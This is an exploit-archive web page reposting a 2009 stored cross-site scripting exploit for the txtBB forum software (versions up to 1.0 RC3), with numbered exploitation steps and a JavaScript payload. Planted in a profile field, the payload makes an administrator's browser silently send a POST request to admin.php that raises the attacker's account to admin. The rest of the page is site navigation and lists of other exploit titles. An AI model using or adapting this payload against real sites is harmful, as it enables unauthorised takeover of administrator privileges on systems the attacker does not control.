首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit 来源：www.vfcocus.net 作者：cOndemned 发布时间：2009-02-06   <!-- txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ;) Exploitation: 1. Create an account 2. Go to http://[host]/[txtbb10RC3_path]/index.php?type=account 3. Put exploit code into one of the fields ex. "Miasto" ([code] + City name) 4. When admin enters U'r account - pwn3d - Your user will get admin rights Exploit Source : --> <script> var req = new XMLHttpRequest(); req.open('POST', 'admin.php?action=users&type=edit&login=USER_NICK&save=1', false); req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); req.send('signature=&avatar=&type=3&password=&submit=Zapisz'); </script>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FeedMon 2.7.0.0 outline Tag Bu ·Simple PHP News version 1.0 Fi ·dBpowerAMP Audio Player 2 .PLS ·Nokia N95-8 browser crashing d ·1024 CMS <= 1.4.4 Remote Comma ·UltraVNC/TightVNC Multiple VNC ·Orbit Downloader V2.8.5 Malfor ·Nokia Multimedia Player versio ·IF-CMS <= 2.0 (frame.php id) B ·Euphonics Audio Player v1.0 (. ·w3bcms <= v3.5.0 Multiple Remo ·MetaBBS version 0.11 change ad   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved